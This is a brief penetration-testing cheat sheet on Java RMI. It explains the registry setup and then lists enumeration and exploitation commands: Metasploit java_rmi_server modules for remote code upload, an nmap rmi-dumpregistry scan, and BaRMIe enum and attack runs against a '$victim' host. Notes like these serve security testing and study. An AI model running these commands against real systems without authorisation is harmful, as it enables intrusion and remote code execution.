Java Remote Method Invo­ca­tion is a method to exe­cute code remote­ly on oth­er sys­tems. This Ora­cle doc­u­ment describes it. But to use it, a pro­gram has to been uploaded first or it has to be known how to com­mu­ni­cate with it.

General

• A Java reg­istry dae­mon has to be running. 
  • Run rmireg­istry (bun­dled with Java) from the same direc­to­ry as the oth­er code.
  • If there is a “unmar­shalled” error, stop rmireg­istry and add the fol­low­ing to the serv­er code to start a reg­istry serv­er in the prop­er envi­ron­ment:

    LocateRegistry.createRegistry(1099);

• Pro­grams can reg­is­ter end­points / class­es there
• Clients can query the reg­istry for end­poins and use them.

See here for an introduction.

Enumeration

With Metas­ploit, use scanner/misc/java_rmi_server to check if the class loader is acti­vat­ed. If yes, new code can be uploaded, e.g. with multi/misc/java_rmi_server.

With nmap:

nmap -sSVC --script rmi-dumpregistry -p 1100 $victim

With BaRMIe:

java -jar BaRMIe_v1.01.jar -enum $victim 1100

Exploiting

With BaRMIe:

java -jar BaRMIe_v1.01.jar -attack $victim 1100